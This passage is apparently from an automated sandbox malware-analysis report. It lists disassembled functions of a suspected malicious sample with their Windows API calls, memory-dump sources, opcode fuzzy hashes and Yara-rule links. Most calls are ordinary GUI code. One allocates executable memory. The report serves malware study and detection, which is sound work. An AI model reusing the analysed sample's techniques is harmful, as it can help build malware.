                                                                                                      • Part of subcall function 032CE97C: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 032CE99A
                                                                                                    • GetClassInfoA.USER32(032B0000,03302748,?), ref: 03302B0B
                                                                                                    • RegisterClassA.USER32(0331B650), ref: 03302B23
                                                                                                      • Part of subcall function 032B669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 032B66CE
                                                                                                    • SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 03302BBF
                                                                                                    • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 03302BE1
                                                                                                    • SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 03302BF4
                                                                                                    • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,032F99F8), ref: 03302BFF
                                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,032F99F8), ref: 03302C0E
                                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,032F99F8), ref: 03302C1B
                                                                                                    • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,032F99F8), ref: 03302C32
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2103932818-0
                                                                                                    • Opcode ID: 413487e130b9f353cfd9fa6be57dee88d6da984f31790c591f3d676e085951dd
                                                                                                    • Instruction ID: ba748d6abd5569f0acd42d28642683c285449d57809feb0f09b3795cf1946709
                                                                                                    • Opcode Fuzzy Hash: 413487e130b9f353cfd9fa6be57dee88d6da984f31790c591f3d676e085951dd
                                                                                                    • Instruction Fuzzy Hash: 15418F74650340AFEB20FF68DCD1FAA73ACAB18740F5454A4F940DF2D6D6B5A8808B24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032EB10C Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 032EB143
                                                                                                    • GetDCEx.USER32(?,00000000,00000402), ref: 032EB156
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032EB179
                                                                                                    • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 032EB19F
                                                                                                    • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 032EB1C1
                                                                                                    • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 032EB1E0
                                                                                                    • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 032EB1FA
                                                                                                    • SelectObject.GDI32(?,?), ref: 032EB207
                                                                                                    • ReleaseDC.USER32(?,?), ref: 032EB221
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$DesktopReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1187665388-0
                                                                                                    • Opcode ID: 60152969c72596b39cc23c460afb7a4e96cadd9de5f0c0ba128a20f77dc78231
                                                                                                    • Instruction ID: 02ffdefb125f4380200a6e9361380eb602846333ca050084d0f0d0f1f8b7bd75
                                                                                                    • Opcode Fuzzy Hash: 60152969c72596b39cc23c460afb7a4e96cadd9de5f0c0ba128a20f77dc78231
                                                                                                    • Instruction Fuzzy Hash: 5731E7BAA10219AFDB00DEECCC85DEFBBBCFF09640B444464B514FB240D6B5AD448BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BCFCC Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(00000000,032BD297,?,?,00000000,00000000), ref: 032BD002
                                                                                                      • Part of subcall function 032BB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 032BB8E2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$InfoThread
                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                    • API String ID: 4232894706-2493093252
                                                                                                    • Opcode ID: 2a9ea0af230894dafe7aca71c907a380edb5881a4ad805597eae21c6d7de0928
                                                                                                    • Instruction ID: 7e80d84c8a15617261615d75e6f45e7d94a7917b06cf77417b536913dba7b2a1
                                                                                                    • Opcode Fuzzy Hash: 2a9ea0af230894dafe7aca71c907a380edb5881a4ad805597eae21c6d7de0928
                                                                                                    • Instruction Fuzzy Hash: 29613F78B2028C9BDB00FBA4E880BDEB7B9DF88381F549835E5449F746CA74D9C59760
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032EE5A4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(?,?,?), ref: 032EE668
                                                                                                    • UnregisterClassA.USER32(?,?), ref: 032EE690
                                                                                                    • RegisterClassA.USER32(?), ref: 032EE6A6
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 032EE6E2
                                                                                                    • GetWindowLongA.USER32(00000000,000000F4), ref: 032EE6F7
                                                                                                    • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 032EE70A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                                                    • String ID: @
                                                                                                    • API String ID: 717780171-2766056989
                                                                                                    • Opcode ID: e6ac7c9d6ca54694cb59e217e1f1e9d6298de7083702e59fdd0f9014c2c01970
                                                                                                    • Instruction ID: 6c3463a4ae5f3e86df0924f99f21bd6293e96240a21041b35b2a963e13424f87
                                                                                                    • Opcode Fuzzy Hash: e6ac7c9d6ca54694cb59e217e1f1e9d6298de7083702e59fdd0f9014c2c01970
                                                                                                    • Instruction Fuzzy Hash: 29519E35A207188FDB20EF68CC85BDEB7F9AF44304F5449A9E959DB281DB70A984CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032DAFE8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMonitorInfoA.USER32(?,?), ref: 032DB019
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 032DB040
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 032DB055
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 032DB060
                                                                                                    • lstrcpyA.KERNEL32(?,DISPLAY), ref: 032DB08A
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                                    • String ID: DISPLAY$GetMonitorInfo
                                                                                                    • API String ID: 1539801207-1633989206
                                                                                                    • Opcode ID: 11ad206c6aa411338fce254ba6233aba7974599288417c2d0806896b6e80b8d4
                                                                                                    • Instruction ID: 2603998756934e3d401bc1dea28abf3c8048acd7fe14d83a3bcbbc3086df0f67
                                                                                                    • Opcode Fuzzy Hash: 11ad206c6aa411338fce254ba6233aba7974599288417c2d0806896b6e80b8d4
                                                                                                    • Instruction Fuzzy Hash: F7110A71A283015FE720DF65A884BA7B7ECEF09712F054519ED5687240D7B0A4C4CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B4608 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032B46CF,?,?,0332F7C8,?,?,0331A7AC,032B68FD,03319751), ref: 032B4641
                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032B46CF,?,?,0332F7C8,?,?,0331A7AC,032B68FD,03319751), ref: 032B4647
                                                                                                    • GetStdHandle.KERNEL32(000000F5,032B4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032B46CF,?,?,0332F7C8), ref: 032B465C
                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,032B4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032B46CF,?,?), ref: 032B4662
                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 032B4680
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                    • Opcode ID: b544485bb686a5cd032435b6eba7de8d1f23443c94782e26b94d6cc3bf6813d7
                                                                                                    • Instruction ID: 6f254c0ef3c19ef1871c01b8831573b9185bf9c7c87d1d351c527896f0f9208e
                                                                                                    • Opcode Fuzzy Hash: b544485bb686a5cd032435b6eba7de8d1f23443c94782e26b94d6cc3bf6813d7
                                                                                                    • Instruction Fuzzy Hash: CBF0246566139438EA20F2906CDAFED277C4744F65F188308F2B0980CBC7E4A0D08B21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03305EE8 Relevance: 12.2, APIs: 8, Instructions: 170windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 03305F47
                                                                                                    • ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 03305FE8
                                                                                                    • SetTextColor.GDI32(00000000,00FFFFFF), ref: 03306035
                                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 0330603D
                                                                                                    • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 03306062
                                                                                                      • Part of subcall function 03305EC0: ImageList_GetBkColor.COMCTL32(00000000,?,03305F21,00000000,?), ref: 03305ED6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ColorImageList_$Draw$Text
                                                                                                    • String ID:
                                                                                                    • API String ID: 2027629008-0
                                                                                                    • Opcode ID: 8d3d0f399e559347689e618904e1cfe43bc33eecb9cf0b78bde457679a64346f
                                                                                                    • Instruction ID: 60d95b09d73e0a66741fa0a8ae433b5b9769f1570de2d7f8f78e8a3f57d55ab4
                                                                                                    • Opcode Fuzzy Hash: 8d3d0f399e559347689e618904e1cfe43bc33eecb9cf0b78bde457679a64346f
                                                                                                    • Instruction Fuzzy Hash: 90510379710205AFDB50FF68CDC1FAE37A9AF09700F144164FA14EF285CAB4E8818BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 033006BC Relevance: 12.2, APIs: 8, Instructions: 154windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCapture.USER32 ref: 0330072D
                                                                                                    • GetCapture.USER32 ref: 0330073C
                                                                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 03300742
                                                                                                    • ReleaseCapture.USER32 ref: 03300747
                                                                                                    • GetActiveWindow.USER32 ref: 03300798
                                                                                                    • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0330082E
                                                                                                    • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 0330089B
                                                                                                    • GetActiveWindow.USER32 ref: 033008AA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 862346643-0
                                                                                                    • Opcode ID: 847b606e5ac757aea309139db8345f51ef8f2b04c346757d000acac816d17507
                                                                                                    • Instruction ID: 068e3a5ad06d026a35f4521d16b52ac2d1ee95c2a9e518f17972c14b6b42bc34
                                                                                                    • Opcode Fuzzy Hash: 847b606e5ac757aea309139db8345f51ef8f2b04c346757d000acac816d17507
                                                                                                    • Instruction Fuzzy Hash: 27513638A10344EFEB19EFA9C9D5B9DB7F9EF45700F5540A4E544AB2A1C774AE80CB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032EFD74 Relevance: 12.1, APIs: 8, Instructions: 136COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SaveDC.GDI32(?), ref: 032EFD91
                                                                                                      • Part of subcall function 032E8B8C: GetWindowOrgEx.GDI32(00000000), ref: 032E8B9A
                                                                                                      • Part of subcall function 032E8B8C: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 032E8BB0
                                                                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 032EFDCA
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 032EFDDE
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 032EFDFF
                                                                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 032EFE2F
                                                                                                    • DrawEdge.USER32(?,?,00000000,00000000), ref: 032EFE3E
                                                                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 032EFE67
                                                                                                    • RestoreDC.GDI32(?,?), ref: 032EFEE6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976466617-0
                                                                                                    • Opcode ID: 8614fe5fa27626fdb040acc37287d2d850e1e9f62c4730fbe640060574c6f1ee
                                                                                                    • Instruction ID: 30efbe3339ff04c96dd47fcde054e2025cbfefa436f7a881cd2d48565dd58e5d
                                                                                                    • Opcode Fuzzy Hash: 8614fe5fa27626fdb040acc37287d2d850e1e9f62c4730fbe640060574c6f1ee
                                                                                                    • Instruction Fuzzy Hash: 4F410D75A10309AFDB10DB98C981F9EB7B8EF48300F5541A4F614EB392C775AE80CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03303BD4 Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCapture.USER32 ref: 03303BFA
                                                                                                    • IsWindowUnicode.USER32(00000000), ref: 03303C3D
                                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,02BE67A0,?), ref: 03303C58
                                                                                                    • SendMessageA.USER32(00000000,-0000BBEE,02BE67A0,?), ref: 03303C77
                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 03303C86
                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 03303C94
                                                                                                    • SendMessageA.USER32(00000000,-0000BBEE,02BE67A0,?), ref: 03303CB4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                                                    • String ID:
                                                                                                    • API String ID: 1994056952-0
                                                                                                    • Opcode ID: 06393541d494b79cb18f411f6f046d5007551d2a5c70ead2d650a19ad48b6f7d
                                                                                                    • Instruction ID: a163593275cb1e168003ca66783ac122d2758d96dcbbbe2cfb273842a79f2bad
                                                                                                    • Opcode Fuzzy Hash: 06393541d494b79cb18f411f6f046d5007551d2a5c70ead2d650a19ad48b6f7d
                                                                                                    • Instruction Fuzzy Hash: B7214B79314309AFD660FA5DCDD0F67B3EC9F45660F184828F959CB782DA60F8448764
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D3A60 Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 032D3A8E
                                                                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 032D3AAA
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 032D3AC9
                                                                                                    • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 032D3AED
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 032D3B0B
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 032D3B1F
                                                                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 032D3B3F
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 032D3B57
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 1781840570-0
                                                                                                    • Opcode ID: 662bf5cc08e42f5a7a935c941411e9de4d57edae530f76f8cdaf9d0b877c9924
                                                                                                    • Instruction ID: dbcf3d38cd6b01de896368fb1a2e9c7fdb9ae2cc0034b931a6c3917b7c85835e
                                                                                                    • Opcode Fuzzy Hash: 662bf5cc08e42f5a7a935c941411e9de4d57edae530f76f8cdaf9d0b877c9924
                                                                                                    • Instruction Fuzzy Hash: 322124B5A50309AEDB10DBA4CD85FAEB3BCEB48744F500591B704EB180D6B59E84CB25
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032DF9B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 177windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00000000,032DFC05), ref: 032DFA50
                                                                                                    • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 032DFB59
                                                                                                      • Part of subcall function 032DFEB8: CreatePopupMenu.USER32 ref: 032DFED3
                                                                                                    • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 032DFBE2
                                                                                                      • Part of subcall function 032DFEB8: CreateMenu.USER32 ref: 032DFEDD
                                                                                                    • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 032DFBC9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                    • String ID: ,$?
                                                                                                    • API String ID: 2359071979-2308483597
                                                                                                    • Opcode ID: 383b2d1e24b8f05dcf1a1adae940abcb4eea94474ea74e5141fa252d462faba4
                                                                                                    • Instruction ID: f9afa8d7713240f50607c08982ba88ef5ee46897357414a734e63bf5643ec373
                                                                                                    • Opcode Fuzzy Hash: 383b2d1e24b8f05dcf1a1adae940abcb4eea94474ea74e5141fa252d462faba4
                                                                                                    • Instruction Fuzzy Hash: 94611334A34345AFCB10EF68D9C0AAEB7F8AF05740F4844A5E851EB39AD374D994CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032F3720 Relevance: 10.7, APIs: 7, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,032F3904), ref: 032F3805
                                                                                                    • GetTickCount.KERNEL32 ref: 032F380A
                                                                                                    • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 032F384E
                                                                                                    • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 032F3866
                                                                                                    • AnimateWindow.USER32(00000000,00000064,?), ref: 032F38AB
                                                                                                    • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,032F3904), ref: 032F38CE
                                                                                                      • Part of subcall function 032F6EE0: GetCursorPos.USER32(?), ref: 032F6EE4
                                                                                                    • GetTickCount.KERNEL32 ref: 032F38EB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3024527889-0
                                                                                                    • Opcode ID: 25e456679c54c50a11a558d8dbbb727ae0636c43fd59c86ed2b2764693531da0
                                                                                                    • Instruction ID: 1be2856467363404f9066e28fb362e6ddbcae412da014c6c37aabbf2c9223581
                                                                                                    • Opcode Fuzzy Hash: 25e456679c54c50a11a558d8dbbb727ae0636c43fd59c86ed2b2764693531da0
                                                                                                    • Instruction Fuzzy Hash: A5512A7CA10205EFDB10EFA8C985AAEF7F5BF44700F6445A0E640EB254D775AE84CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03304114 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 033054C0: GetActiveWindow.USER32 ref: 033054E7
                                                                                                      • Part of subcall function 033054C0: GetLastActivePopup.USER32(?), ref: 033054F9
                                                                                                    • GetWindowRect.USER32(?,?), ref: 03304196
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 033041CE
                                                                                                    • MessageBoxA.USER32(00000000,?,?,?), ref: 0330420D
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,03304283), ref: 0330425D
